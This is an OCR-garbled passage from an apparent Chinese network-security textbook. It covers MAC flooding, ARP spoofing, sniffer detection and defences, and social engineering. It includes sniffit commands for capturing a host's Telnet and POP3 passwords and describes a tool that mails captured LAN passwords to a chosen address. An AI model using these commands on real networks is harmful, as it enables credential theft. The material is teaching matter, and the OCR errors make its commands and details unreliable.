3. 交换 式 局 域 网 监听 的 实现 

1) 方法 一 : MAC 洪水 

所 谓 MAC 洪水 攻击 ， 就 是 向 交换 机 发 送 大 量 含有 虚假 MAC 地 址 和 了 P 地 址 的 他 包 ， 
使 交换 机 无 法 处 理 如 此 多 的 信息 而 引起 设备 工作 异常 ， 也 就 是 所 谓 的 “失效 ”模式 ， 在 这 
个 模式 里 ， 交 换 机 的 处 理 器 已 经 不 能 正常 分 析 数 据 报 查询 地 址 表 了 ， 然 后 ， 交 换 机 就 会 成 
为 一 台 普 通 的 集线器 ， 毫 无 选择 地 向 所 有 端口 发 送 数据 ， 这 个 行为 被 称 做 “ 泛 洪 发 送 ” 这 
样 一 来 攻击 者 就 能 监听 到 所 需 数据 了 。 


2) 方法 二 : ARP 欺骗 

在 局 域 网 寻 址 方式 中 ， 一 台 主 机 A 如 果 要 向 目标 主机 B 发 送 数据 ， 无 论 主机 B 在 本 
网 段 还 是 在 远程 网 络 , 这些 需要 发 出 去 的 数据 包 中 需要 4 个 必 不 可 少 的 地 址 :( 源 下 地址 ， 
源 MAC 地 址 ) 十 〈 目 标 卫 地 址 ， 目 标 MAC 地 址 )。 当 主机 A 在 封装 数据 包 时 ， 自 然 知 
道 自己 的 他 地 址 和 MAC 地 址 , 同时 目标 了 P 自己 也 知道 , 需要 得 到 B 的 MAC 地址。 通过 
ARP 协议 ， 主 机 A 得 到 主机 B 的 MAC 地 址 ， 并 且 把 人 P 地 址 与 MAC 地 址 的 对 应 关系 放 
在 缓存 表 中 ， 以 备 下 一 次 再 使 用 。 但 要 说 明 的 是 ， 因 为 考虑 到 主机 B 有 更 换 网 卡 的 可 能 ， 
所 以 无 论 何 时 当主 机 A 再 次 收 到 关于 主机 B 的 MAC 地 址 更 新 信息 ， 它 都 将 刷新 自己 的 
ARP 缓存 表 ， 将 新 收 到 的 MAC 地 址 和 主机 B 的 人 P 地 址 对 应 起 来 ， 正 因为 主机 A 在 任何 
时 候 收 到 ARP 数据 包 ， 都 将 再 次 更 新 ARP 缓存 ， 所 以 导致 了 ARP 欺骗 的 发 生 。 

如 图 5-18 所 示 ， 假 设 局 域 网 内 有 两 台 计 算 机 A 和 B 在 通信 ， 而 计算 机 C 要 作为 一 个 
窃听 者 的 身份 得 到 这 两 台 计 算 机 的 通信 数据 ， 那 么 它 就 必须 想 办 法 让 自己 能 插入 两 台 计 算 
机 之 间 的 数据 线路 里 ， 而 在 这 种 一 对 一 的 交换 式 网 络 里 ， 计 算 机 C 必须 成 为 一 个 中 间 设 备 
才能 让 数据 得 以 经 过 它 ， 要 实现 这 个 目标 ， 计 算 机 C 就 要 开始 伪造 虚假 的 ARP 报 文 。 


地 址 表 : 192.168.8.212-- 00-12-D4-2A-78 地 址 表 : 192.168.8.112 一 00-12-D4-2A-78 
发 往 B 的 数据 人 发 往 A 的 数据 
一 一 fiARpEy 答 -一 < 一 伪造 ARPR 答 一 | 
DS 坪 C 瓜 回 的 原 B 数 据 oR 
主机 A 主机 C( 监 听 者 ) 主机 B 
192.168.8.112 192.168.8.1 192.168.8.212 
01-1B-D4-39-4D 00-12-D4-2A-78 07-46-3B-11-68 
图 5-18 ARP 欺骗 


如 果 现 在 主机 C 想 要 窃取 网 络 中 的 数据 ， 那 么 这 时 它 就 可 能 向 A 发 送 一 个 ARP 数据 
包 ， 数 据 包 中 声称 主机 B 的 MAC 地 址 已 经 改变 ， 当 主机 A 收 到 后 ， 得 知 此 消息 ， 就 立刻 
更 新 原来 主机 B 的 MAC 地 址 ， 当 它 要 和 主机 B 进行 通信 时 ， 就 会 在 数据 包 中 封装 新 的 
MAC 地 址 ， 如 果 这 个 MAC 地 址 是 前 面 主机 C 的 ， 那 么 主机 A 就 会 把 本 来 要 发 给 主机 B 
的 数据 错误 地 发 给 了 主机 C， 被 主机 C 监听 成 功 ， 而 主机 C 为 了 拖 人 耳目 ,“ 看 ”过 数据 
后 ， 再 发 给 主机 B， 从 而 不 影响 主机 A 和 主机 了 B 之 间 的 正常 通信 。 

实际 上 , 真实 环境 里 的 ARP 欺骗 除了 监听 计算 机 A 的 数据 , 通常 也 会 顺便 把 计算 机 B 
的 数据 给 监听 了 ， 只 要 计算 机 C 在 对 计算 机 A 发 送 伪装 成 计算 机 B 的 ARP 应 答 包 的 同时 
也 向 计算 机 B 发 送 伪装 成 计算 机 A 的 ARP 应 答 包 即 可 ， 这 样 它 就 可 作为 一 个 双向 代理 的 
身份 插入 两 者 之 间 的 通信 链 路 。 
S.3.$ 监听 检测 方法 

网 络 监听 是 很 难 被 发 现 的 。 因 为 运行 网 络 监听 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 
的 信息 ， 并 没有 主动 的 行动 ， 也 不 能 修改 在 网 上 传输 的 信息 包 。 当 某 一 危险 用 户 运 行 网 络 
监听 软件 时 ， 可 以 通过 ps -ef 或 ps -aux 命令 来 发 现 它 。 能 够 运行 网 络 监听 软件 ， 说 明 该 
用 户 已 经 具有 了 超级 用 户 的 权限 ， 他 可 以 修改 任何 系统 命令 文件 ， 来 掩盖 自己 的 行踪 。 其 
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实 修改 ps 命令 只 需 短 短 数 条 Shell 命令 ， 就 可 将 监听 软件 的 名 字 过 滤 掉 。 

另外 ， 当 系统 运行 网 络 监听 软件 时 ， 系 统 因为 负荷 过 重 ， 会 对 外 界 的 响应 很 慢 。 但 也 
不 能 因为 一 个 系统 响应 过 慢 而 怀疑 其 正在 运行 网 络 监听 软件 ， 有 以 下 几 种 方法 可 以 检测 系 
统 是 否 在 运行 网 络 监 听 软 件 。 

二 法 一 

对 于 怀疑 运行 监听 程序 的 机 器 , 用 正确 的 他 地 址 和 错误 的 物理 地 址 去 ping, 运行 监听 
程序 的 机 器 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 地 址 ， 处 于 监听 状态 的 机 器 
接收 。 如 果 他 的 他 stack 不 再 次 反 向 检查 的 话 , 就 会 响应 ,这 种 方法 依赖 于 系统 的 IP stack， 
对 一 些 系 统 可 能 行 不 通 。 

假设 下 为 192.168.8.4 的 机 器 上 装 有 ARP 欺骗 工具 和 监听 工具 ，ping 192.168.8.4， 然 
后 arp -a|find “192.168.8.4” 得 到 它 的 MAC 地址 “00-00-0e-40-b4-al”。 

修改 自己 的 网 卡 驱动 设置 页 ， 改 Network Address 为 “00000e40b4a2”， 即 去 掉 分 隔 符 
的 MAC 地 址 最 末 位 加 1。 

再 次 ping 192.168.8.4， 正 常 的 话 应 该 不 会 看 到 任何 回应 ， 因 为 正常 的 主机 不 会 回应 不 
与 其 MAC 地址 对 应 的 数据 包 ， 会 将 广播 来 的 包 丢 弃 ， 但 监听 主机 却 会 回应 所 有 数据 包 。 

如 果 看 到 返回 ， 则 说 明 TP 地 址 为 192.168.8.4 的 主机 很 可 能 装 有 监听 工具 。 

类 方法 三 

向 网 络 发 大 量 不 存在 的 物理 地 址 的 包 , 由 于 监听 程序 将 处 理 这 些 包 , 将 导致 性 能 下 降 ， 
通过 比较 前 后 该 机 器 性 能 加 以 判断 ， 这 种 方法 难度 比较 大 。 

35 方法 三 

一 个 可 行 的 检查 监听 程序 的 方法 是 搜集 所 有 主机 上 运行 的 进程 ， 使 用 UNIX 和 
Windows 机 器 可 以 很 容易 地 得 到 当前 进程 的 清单 。 

4. 方法 四 

搜索 监听 程序 。 入 侵 者 很 可 能 使 用 的 是 一 个 免费 软件 ， 管 理 员 就 可 以 检查 目录 ， 找 出 
监听 程序 ， 但 这 是 比较 困难 而 且 很 费时 间 。 


S.3.6 局域网 内 监听 的 防御 


1. 从 风 辑 或 物理 上 对 网 络 分 段 

网 络 分 段 通 常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基本 手段 ， 但 其 实 也 是 保证 网 络 安全 
的 一 项 措施 , 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 , 从 而 防止 可 能 的 非法 监听 。 

2. 使 用 交换 网 络 
于 共享 式 局 域 网 的 局 限 性 (集线器 不 会 选择 具体 端口 )， 在 上 面 流通 的 数据 基本 上 
是 “你 有 ， 我 也 有 ”的 ， 监 听 者 连 ARP 信息 都 不 需要 更 改 ， 自 然 无 法 躲 过 被 监听 的 命运 ， 
要 解决 这 个 问题 ， 只 能 先 把 集线器 更 换 为 交换 机 ， 杜 绝 这 种 毫 无 隐私 的 数据 传播 方式 。 

3. MAC 地 址 绑 定 

虽然 利用 ARP 欺骗 报 文 进行 的 网 络 监听 很 难 察觉 ， 但 它 并 不 是 无 法 防御 的 ， 与 ARP 
寻 址 相对 地 ,在 一 个 相对 稳定 的 局 域 网 里 , 我 们 可 以 使 用 静态 ARP 映射 ， 即 记录 下 局 域 网 
内 所 有 计算 机 的 网 卡 MAC 地 址 和 对 应 的 卫 地 址 ， 然 后 使 用 “arp -s IP 地 址 MAC 地 址 ” 
进行 静态 绑 定 ， 这 样 计算 机 就 不 会 通过 ARP 广播 来 找 人 了 ， 自 然 不 会 响应 ARP 欺骗 工具 
发 送 的 动态 ARP 应 答 包 (更 态 地 址 的 优先 度 大 于 动态 地 址 )。 


4. 使 用 软件 防御 

例如 Anti Arp Sniffer， 它 可 以 强行 绑 定 本 机 与 网 关 的 MAC 关系 ， 让 伪装 成 网 关 获 取 
数据 的 监听 机 成 了 摆设 , 如果 监听 者 仅仅 欺骗 了 某 台 计 算 机 的 情况 , 这 就 要 使 用 ARP Watch 
了 ，ARP Watch 会 实时 监控 局 域 网 中 计算 机 MAC 地 址 和 ARP 广播 报 文 的 变化 情况 ， 如 果 
有 ARP 欺骗 程序 发 送 虚 假 地 址 报 文 ， 必 然 会 造成 MAC 地 址 表 不 符 ，ARP Watch 就 会 弹出 
来 警告 用 户 了 。 

5. 划分 VLAN 

此 外 ， 对 网 络 进行 VLAN 划分 也 是 有 效 的 方法 ， 每 个 VLAN 之 间 都 是 隔离 的 ， 必 须 
通过 路 由 进行 数据 传输 ， 这 个 时 候 MAC 地 址 信息 会 被 丢弃 ， 每 台 计 算 机 之 间 都 是 采用 标 
准 TCP/IP 进行 数据 传输 的 ， 即 使 存在 监听 工具 也 无 法 使 用 虚假 的 MAC 地 址 进行 欺骗 了 。 

6. 使 用 加 密 技术 

数据 经 过 加 密 后 ， 通 过 监听 仍然 可 以 得 到 传送 的 信息 ， 但 显示 的 是 乱码 。 使 用 加 密 技 
术 的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 比 较 容易 被 攻破 。 系 统管 理 员 和 用 户 需 
要 在 网 络 速度 和 安全 性 上 进行 折 中 。 


S.3.7 监听 工具 


1. 监听 工具 sniffit 

sniffit 是 可 以 在 Linux、SunOS、Solaris 等 平台 运行 的 网 络 监听 软件 ， 主 要 用 于 监听 运 
行 TCP/IP 协议 的 计算 机 以 监听 其 不 安全 性 。 因 为 数据 包 必 须 在 运行 sniffit 的 计算 机 才能 进 
行 监听 , 所 以 它 只 能 监听 同一 个 网 段 上 的 计算 机 , 可 以 为 其 增加 某 些 插件 以 实现 额外 功能 。 
可 以 配置 sniffit 在 后 台 运 行 以 检测 TCP/IP 端口 上 用 户 的 输入 输出 信息 。 用 户 可 以 选择 源 、 
目标 地 址 或 地 址 集合 ， 还 可 以 选择 监听 的 端口 、 协 议和 网 络 接口 等 。sniffit 会 将 监听 到 的 
数据 包 内 容 存放 在 当前 工作 目录 下 ， 可 以 直接 查看 。 由 于 需要 将 网 卡 置 入 混杂 模式 ， 所 以 
必须 用 root 权限 运行 。 

1) sniffit 的 主要 参数 

sniffit 的 主要 参数 如 表 5-2 所 示 。 


表 S-2 sniffit 的 主要 参数 


参数 描述 

-c<file> 通过 脚本 运行 程序 

-fcdevice> 强制 使 用 网 络 硬盘 

和 交互 模式 ， 可 以 查看 网 络 中 正在 连接 的 机 器 及 其 使 用 的 端口 号 

1 显示 假 数据 包 ， 包 括 使 用 ARP、RARP 的 其 他 非 卫 数据 包 

-p<port> 记录 连接 到 <port> 的 包 ，port 为 0 记录 所 有 的 端口 ， 默 认为 0， 只 用 于 TCP 和 UDP 
数据 包 


-s<ip nr/name> ”监听 从 某 严 发 出 的 数据 包 ， 可 以 使 用 @ 通 配 符 选 择 地 址 范围 
-t<ip nr/name> 。 监听 发 送 到 某 卫 的 数据 包 ， 可 以 使 用 @ 通 配 符 选 择 地 址 范围 


注意 : -t 或 -s 适用 于 TCP/UDP 数据 包 ， 对 ICMP 和 了 P 也 进行 解释 。 
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2) sniffit 的 实例 

假定 : 同一 子 网 的 两 台 主 机 ，A 运行 了 sniffit， 另 一 台 B 的 下 为 192.168.8.212。 

(1) 检查 sniffit 是 否 运行 且 另 开 一 个 窗口 。 

sniffit: ~/#sniffit—d —p 7—t192.168.8.212 

(2) sniffit 捕获 了 Telnet 到 对 方 7 号 端口 echo 服务 的 包 。 

sniffit: 一 /$Telent Y7 

(3) 截获 B 上 的 用 户 密码 。 

sniffit: ~/# sniffit —p 23 -t 192.168.8.212 

(4) 截获 所 有 用 户 通过 B 接收 邮件 的 POP3 账号 和 密码 。 

sniffit: ~/#sniffit -p 110 -t 192.168.8.212& 

sniffit: ~/#sniffit -p 110 -s 192.168.8.212& 

(5) 查看 FTP 连接 。 

sniffit: ~/# sniffit -p 21 -10-t192.168.8.212 

(6) 截获 错误 发 生 的 控制 信息 。 

sniffit: ~/# Sniffit -p icmp -b -s 192.168.8.212 

(7) 执行 脚本 。 

sniffit ~c <scriptname>s 

2. 监听 工具 pswmonitor 

监听 工具 pswmonitor〈 密 码 监听 器 ) 用 于 监听 基于 Web 的 邮箱 密码 、POP3 收 信和 密码 
和 FTP 登录 密码 等 , 只 需 在 一 台 计 算 机 上 运行 就 可 以 监听 局 域 网 内 任意 一 台 计 算 机 登录 的 
用 户 名 和 密码 ， 并 将 密码 显示 、 保 存 或 发 送 到 用 户 指定 的 邮箱 ， 主 界面 如 图 5-19 所 示 。 


本 
正在 监 时 | 适配器 | 发 送 与 保存 | 密码 保护 | 其 他 | 


状态 : 正在 监听 网 络 适配器 : 
\Devi ce\NPF_{37AALASA-380F-4CO7-9E08-2B1751C88585} 
密码 数 : 0 保 站 发 适 清除 


eve | | 


图 5-19 密码 监听 器 的 主 界面 


该 工具 软件 功能 比较 强大 ， 可 以 监听 一 个 网 段 所 有 的 用 户 名 和 密码 ， 而 且 还 可 以 指定 
发 送 的 邮箱 ， 设 置 的 界面 如 图 5-20 所 示 。 


EECEE 
正在 监听 | 适配器 ”发送 与 保存 | 密码 保护 | 其 他 | 


接收 密码 的 邮件 地 址 : |[ 测试 


三 自动 保存 
厂 自动 保存 密码 到 文件 
文件 名 : [swsato tt 另存 疗 


Em | zs | 


| 


注册 | 路 | 了 总 |[L 关闭 | 地 助 


图 5-20 设置 密码 监听 器 


该 软件 还 支持 自动 启动 和 隐藏 ， 但 在 实际 使 用 中 ， 有 时 候 密 码 不 能 抓 取 ， 抓 取 成 功率 


不 能 达到 100%。 


hi 上 mmID 一 


6 
7 
8 


思考 与 练习 


. 简 述 监听 技术 与 扫描 技术 的 区 别 。 

. 如何 探测 目标 主机 开放 了 哪些 端口 ? 

. 一 般 情况 下 ， 使 用 端口 扫描 器 为 何 扫描 不 出 QQ 端口 ? 
. X-Scan 扫描 中 的 TCP 和 SYN 两 种 方式 对 扫描 结果 有 什么 影响 ? 

. 如果 有 一 台 主 机 ， 可 以 上 外 网 ， 并 且 主 机 中 还 装 有 网 络 监 听 工 具 ， 屠 是否 可 以 监 
听 某 收费 网 站 的 账号 和 密码 ? 

.实现 网 络 监听 的 条 件 是 什么 ? 

.如 何 避 免 共 享 式 以 太 网 内 的 监听 ? 


. 采用 


MAC 洪水 进行 交换 式 局 域 网 内 的 监听 ， 有 什么 弊端 ? 


.如 何 防御 局 域 网 内 的 监听 ? 


同和 经 条 楷 与 网 经 监听 


振兴 


第 6 章 网 络 攻击 


本 章 学 习 目 标 : 

。 了 解 社会 工程 学 攻击 ; 
掌握 物理 攻击 方法 ; 

了 解 暴 力 攻 击 原 理 及 方法 ; 

掌握 利用 Unicode 漏洞 进行 攻击 的 方法 ; 
理解 缓冲 区 溢出 漏洞 原理 ; 

掌握 DoS 攻击 原理 。 


任何 以 干扰 、 破 坏 网 络 系统 为 目的 的 非 授权 行为 都 称 为 网 络 攻击 。 黑 客 进 行 网 络 攻击 
通常 分 为 三 大 类 型 ， 社会 工程 学 攻击 、 利 用 型 攻击 和 拒绝 服务 型 攻击 。 

1. 社会 工程 学 攻击 

社会 工程 学 攻击 ， 是 一 种 利用 社会 工程 学 来 实施 的 网 络 攻击 行为 。 社 会 工程 学 是 一 种 
利用 人 的 弱点 ， 如 人 的 本 能 反应 、 好 奇 心 、 信 任 、 贪 便宜 等 弱点 进行 诸如 欺骗 、 伤 害 等 危 
害 手 段 ， 获 取 自身 利益 的 手法 。 

2. 利用 型 攻击 

利用 型 攻击 是 一 类 试图 直接 对 用 户 的 机 器 进行 控制 的 攻击 ， 最 常见 的 有 4 种。 

1) 物理 攻击 

物理 安全 是 保护 一 些 比 较 重 要 的 设备 不 被 接触 。 物 理 安全 比较 难 防 ， 因 为 攻击 者 往往 
是 来 自 能 够 接触 到 物理 设备 的 用 户 。 

2) 暴力 攻击 

一 旦 黑客 识别 了 一 台 主 机 而 且 发 现 了 基于 NetBIOS、Telnet 或 NFS 服务 的 可 利用 的 用 
户 账号 , 成 功 的 暴力 破解 口令 能 提供 对 机 器 的 控制 。 防御 的 措施 是 : 选用 难以 猜测 的 口令 ， 
比如 字母 、 数 字 和 标点 符号 的 组 合 ; 确保 像 NetBIOS、Telnet 或 NFS 这 样 可 利用 的 服务 不 
暴露 在 公共 范围 ; 如果 该 服务 支持 锁定 策略 ， 就 进行 锁定 。 

3) 漏洞 攻击 

攻击 者 利用 软件 程序 中 存在 各 种 漏洞 进行 攻击 。 例 如 , 著名 的 Unicode 漏洞 攻击 、SQL 
注入 攻击 以 及 常见 的 缓冲 区 溢出 漏洞 攻击 。 缓 冲 区 溢出 指 的 是 ， 在 很 多 的 服务 程序 中 使 用 
了 像 strcpy0，strcatO 类 似 的 不 进行 有 效 位 检查 的 函数 ， 最 终 可 能 导致 恶意 用 户 编写 一 小 段 
利用 程序 来 进一步 打开 安全 扼 口 ， 然 后 将 该 代码 缀 在 缓冲 区 有 效 代码 末尾 ， 这 样 当 发 生 组 
冲 区 溢出 时 ， 返 回 指针 指向 恶意 代码 ， 这 样 系统 的 控制 权 就 会 被 夺取 。 防 御 的 措施 是 : 利 
用 程序 保护 系统 ， 或 者 浏览 最 新 的 安全 公告 不 断 更 新 操作 系统 。 


4) 木马 攻击 

木马 攻击 是 一 种 直接 由 黑客 或 通过 一 个 不 令 人 怀疑 的 用 户 秘密 安装 到 目标 系统 的 程 
序 。 一 旦 安装 成 功 并 取得 管理 员 权限 ， 安 装 此 程序 的 人 就 可 以 直接 远程 控制 目标 系统 。 防 
御 的 措施 是 :避免 下 载 可 疑 程序 并 拒绝 执行 ,运行 网 络 扫描 软件 定期 监视 内 部 主机 上 的 TCP 
服务 。 

3. 拒绝 服务 型 攻击 

拒绝 服务 (Denial of Service，DoS) 攻击 是 目前 最 常见 的 一 种 攻击 类 型 。 从 网 络 攻击 
的 各 种 方法 和 所 产生 的 破坏 情况 来 看 ，DoS 算是 一 种 很 简单 ， 但 又 很 有 效 的 进攻 方式 。 它 
的 目的 就 是 拒绝 服务 访问 ， 破 坏 服 务 的 正常 运行 ， 最 终 使 网 络 连接 堵塞 ， 或 者 服务 器 因 疲 
于 处 理 攻 击 者 发 送 的 数据 包 而 使 服务 器 系统 的 相关 服务 崩溃 、 系 统 资源 耗 尽 。 

Dos 的 攻击 方式 有 很 多 种 ， 常 见 的 DoS 攻击 方式 有 : 同步 洪流 〈SYNFlood)、 死 亡 之 
Ping (Ping of Death)、Finger 炸弹 、Land 攻击 、Ping 洪流 、Rwhod 和 Smurf 等 。 


6.1 社会 工程 学 攻击 


6.1.1 社会 工程 学 攻击 定义 


社会 工程 学 攻击 就 是 利用 人 们 的 心理 特征 骗取 用 户 的 信任 ， 获 取 机 密 信息 、 系 统 设置 
等 不 公开 的 资料 ， 为 黑客 攻击 和 病毒 感染 创造 有 利 条 件 。 

社会 工程 学 与 黑客 使 用 的 其 他 技术 具有 很 大 的 差别 ， 它 所 研究 的 对 象 不 是 严谨 的 计算 
机 技术 ， 而 是 目标 网 络 的 人 员 。 社 会 工程 学 主要 是 利用 说 服 或 欺骗 的 方法 来 获得 对 信息 系 
统 的 访问 。 这 种 说 服 和 欺骗 通常 是 通过 和 人 交流 或 其 他 互动 方式 实现 的 。 

近年 来 ， 更 多 的 黑客 转向 利用 人 的 弱点 即 社会 工程 学 方法 来 实施 网 络 攻击 。 利 用 社会 
工程 学 手段 ， 突 破 信 息 安 全 防御 措施 的 事件 ， 已 经 呈现 出 上 升 甚至 泛滥 的 趋势 。 

Gartner 集团 信息 安全 与 风险 研究 主任 Rich Mogull 认为 :“ 社 会 工程 学 是 未 来 10 年 最 
大 的 安全 风险 ， 许 多 破坏 力 最 大 的 行为 是 由 于 社会 工程 学 而 不 是 黑客 或 破坏 行为 造成 的 。” 
一 些 信息 安全 专家 预言 ， 社 会 工程 学 将 会 是 未 来 信息 系统 入 侵 与 反 入 侵 的 重要 对 抗 领域 。 

凯 文 米 特 出 版 的 《欺骗 的 艺术 》 堪 称 社 会 工程 学 的 经 典 。 书 中 详细 地 描述 了 许多 运用 
社会 工程 学 入 侵 网 络 的 方法 ， 这 些 方 法 并 不 需要 太 多 的 技术 基础 ， 但 可 怕 的 是 ， 一 旦 懂得 
如 何 利用 人 的 弱点 如 轻信 、 健 忘 、 胆 小 、 仿 便宜 等 ， 就 可 以 轻易 地 潜入 防护 最 严密 的 网 络 
系统 。 他 在 很 小 的 时 候 就 能 够 把 这 一 天 赋 发 挥 到 极致 ， 像 变 魔术 一 样 ， 不 知 不 觉 地 进入 了 
包括 美国 国防 部 、IBM 等 几乎 不 可 能 潜入 的 网 络 系统 ， 并 获取 了 管理 员 权 限 。 

最 近 流 行 的 免费 下 载 软件 中 捆绑 流氓 软件 、 免 费 音乐 中 包含 病毒 、 网 络 钓 鱼 、 垃 圾 电 
子 邮 件 中 包含 间谍 软件 等 ， 都 是 近来 社会 工程 学 的 代表 应 用 。 

目前 社会 工程 学 攻击 主要 包括 两 种 方式 ， 打 电话 和 伪造 E-mail。 

1. 打 电 话 

在 社会 工程 学 中 有 些 黑客 冒充 失去 密码 的 合法 雇员 ， 经 常 通 过 这 种 简单 的 方法 重新 获 
得 密码 。 

2. 伪造 E-mail 

使 用 Telnet， 一 个 黑客 可 以 截取 以 任何 一 个 身份 证 发 送 E-mail 的 全 部 信息 ， 这 样 的 
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E-mail 消息 是 真 的 ， 因 为 它 发 自 于 一 个 合法 的 用 户 。 黑 客 可 以 伪造 这 些 信息 显得 绝 
对 真实 的 E-mail， 一 个 冒充 系统 管理 员 或 经 理 的 黑客 就 能 较为 轻松 地 获得 大 量 的 信 
息 ， 实 施 他 们 的 恶意 阴谋 。 
【案例 1】 

1978， 瑞 夫 金 无 意 中 来 到 了 美国 保险 太平 洋 银行 的 授权 职员 准 入 的 电汇 交易 室 ， 这 里 
每 天 的 转 款额 达到 几 十 亿美 元 。 瑞 夫 金 当时 工作 的 那 家 公司 恰巧 负责 开发 电汇 交易 室 的 数 
据 备份 系统 ， 这 给 了 他 了 解 转账 程序 的 机 会 ， 包 括 银行 职员 拨 出 账 款 的 步骤 。 他 了 解 到 被 
授权 进行 电汇 的 交易 员 每 天 早晨 都 会 收 到 一 个 严密 保护 的 密码 ， 用 来 进行 电话 转账 交易 。 
电汇 室 里 的 交易 员 为 了 记 住 每 天 的 密码 ， 图 省 事 把 密码 记 到 一 张 纸 片 上 ， 并 把 它 贴 到 很 容 
易 看 得 见 的 地 方 。 瑞 夫 金 利用 打 电 话 冒 充 工 作 人 员 转 账 一 千 零 二 十 万 美元 。 几 天 后 ， 瑞 夫 
金 乘 飞机 来 到 瑞士 提取 了 现金 ， 他 拿 出 八 百 万 通过 俄罗斯 一 家 代理 处 购置 了 一 些 钻石 ， 然 
后 把 钻石 封 在 腰带 里 通过 了 海关 , 飞 回 美国 。 瑞 夫 金 成 功 地 实施 了 历史 上 最 大 的 银行 动 案 ， 
他 没有 使 用 武器 ， 甚 至 无 需 计 算 机 的 协助 。 奇 怪 的 是 ， 这 一 事件 以 “最 大 的 计算 机 诈骗 案 ” 
为 名 ， 收 录 在 吉 尼 斯 世界 纪录 中 。 
【案例 2】 

2011 年 1 月 的 一 天 下 午 ， 一 通 陌生 电话 打 到 “满座 网 ”的 前 台 ， 带 去 了 令 人 开心 的 消 
息 一 一 这 家 “新 开张 的 礼品 公司 ”希望 让 满座 网 的 全 体 员工 试 吃 它 的 巧克力 产品 。 但 是 ， 
免费 巧克力 需要 赁 一 条 内 含 电子 券 的 手机 短信 获取 ， 因 此 它 需 要 得 到 满座 网 的 通讯 录 。 前 
台 小 姐 表 示 很 乐意 帮 这 个 忙 。 几 分 钟 后 ， 拨 打 这 通电 话 的 人 便 轻 松 得 到 了 这 家 在 中 国 销售 
规模 位 列 前 5 名 的 团购 网 站 所 有 员工 的 联系 方式 。 


6.1.2 ”社会 工程 学 攻击 分 析 


可 以 从 两 个 层次 来 对 社会 工程 学 的 攻击 进行 分 析 : 物理 上 的 和 心理 上 的 。 

1. 物理 分 析 

物理 上 ， 入 侵 发 生 的 物理 地 点 可 以 是 工作 区 、 电 话 、 目 标 企业 垃圾 堆 ， 甚 至 是 在 网 上 。 

(1) 对 于 工作 区 来 说 ， 黑 客 可 以 简单 地 只 是 走 进来 ， 冒 充 被 允许 进入 公司 的 维护 人 员 
或 是 顾问 。 大 多 数 情况 下 ， 入 侵 者 可 以 对 整个 工作 区 进行 深入 的 观察 ， 直 到 找到 一 些 密码 
或 是 一 些 可 以 利用 的 资料 之 后 离开 。 另 一 种 获得 审核 信息 的 手段 就 是 简单 地 站 在 工作 区 那 
里 观察 公司 雇员 如 何 输入 密码 并 偷偷 地 记 住 。 

(2) 最 流行 的 社会 工程 学 手段 是 通过 电话 进行 的 。 黑 客 可 以 冒充 一 个 权力 很 大 或 是 很 
重要 的 人 物 的 身份 打 电 话 从 其 他 用 户 那里 获得 信息 。 一 般 机 构 的 咨询 台 容 易 成 为 这 类 攻击 
的 目标 。 黑 客 可 以 伪装 成 是 从 该 机 构 的 内 部 打 电 话 来 欺骗 或 是 公司 的 管理 员 ， 所 以 说 依赖 
于 对 打 电 话 的 人 身份 的 确认 并 不 是 很 安全 的 做 法 。 

(3) 翻 垃圾 是 另 一 种 常用 的 社会 工程 学 手段 。 因 为 企业 的 垃圾 堆 里 面 往 往 包含 了 大 量 
的 信息 。 在 垃圾 堆 中 可 以 找 出 很 多 危害 安全 的 信息 ， 包 括 公 司 的 电话 本 、 机 构 表 格 、 备 态 
录 、 公 司 的 规定 手册 、 会 议 时 间 安 排 表 、 事 件 和 假期 、 系 统 手 册 、 打 印 的 敏感 信息 或 是 登 
录 名 和 密码 、 打 印 出 来 的 源 代码 、 磁 盘 和 磁带 、 公 司 的 信件 头 格式 以 及 备忘录 的 格式 ， 以 
及 废旧 的 硬件 。 这 些 资源 可 以 向 黑客 提供 大 量 的 信息 。 

(4) 互联 网 是 使 用 社会 工程 学 来 获取 密码 的 乐园 。 这 主要 是 因为 许多 用 户 都 把 自己 所 
有 账号 的 密码 设置 为 同样 的 一 个 。 所 以 一 旦 黑客 拥有 了 其 中 的 一 个 密码 以 后 ， 他 就 获得 了 


多 个 账号 的 使 用 权 。 黑 客 常用 的 一 种 手段 是 通过 在 线 表格 进行 社会 工程 学 攻击 。 他 可 以 发 
送 某 种 彩票 中 奖 的 消息 给 用 户 ， 然 后 要 求 用 户 输入 姓名 (以 及 电子 邮件 地 址 一 一 这 样 他 甚 
至 可 以 获得 用 户 在 机 构 内 部 使 用 的 账户 名 ) 以 及 密码 。 这 种 表格 不 光 可 以 以 在 线 表 格 的 方 
式 发 送 ， 同 样 可 以 使 用 普通 邮件 进行 发 送 。 况 且 如 果 是 使 用 普通 信件 这 种 方式 的 话 这 些 表 
格 看 上 去 就 会 更 加 像 是 从 合法 的 机 构 中 发 出 的 ， 欺 骗 的 可 能 性 也 就 更 大 了 。 黑 客 在 线 获得 
信息 的 另 一 种 方法 是 冒充 为 该 网 络 的 管理 员 通 过 电子 邮件 向 用 户 索 要 密码 。 这 种 方法 并 不 
是 十 分 有 效 ， 因 为 用 户 在 线 的 时 候 对 黑客 的 警觉 性 比 不 在 线 时 要 高 ， 但 是 该 方法 仍然 是 值 
得 考虑 的 。 进一步 来 说 , 黑客 也 有 可 能 放置 弹 出 窗口 并 让 它 看 起 来 像 是 整个 网 站 的 一 部 分 ， 
声称 是 用 来 解决 某 些 问题 ， 诱 使 用 户 重新 输入 账号 与 密码 。 这 时 用 户 一 般 会 知道 不 应 当 通 
过 明文 来 传输 密码 , 但 是 ， 即使 如 此 , 管理 员 也 应 当 定 期 地 提醒 用 户 防 范 这 种 类 型 的 欺骗 。 
如 果 想 做 到 进一步 的 安全 的 话 ， 系 统管 理 员 应 当 警 告 用 户 ， 除 非 是 与 合法 可 信 网 络 工作 人 
员 进 行 面对面 交谈 ， 和 否则 任何 时 候 都 不 能 公开 自己 的 密码 。 

(5) 电子 邮件 同样 可 以 被 用 来 作为 更 直接 获取 系统 访问 权限 的 手段 。 例 如 ， 从 某 位 有 
信任 关系 的 人 发 来 的 电子 邮件 附件 中 可 能 携带 病毒 、 蠕 虫 或 者 是 木马 。 

2. 心理 分 析 

除了 这 些 物 理 手段 以 外 ， 黑 客 也 可 能 充分 利用 用 户 的 心理 ， 从 心理 学 角度 进行 社会 工 
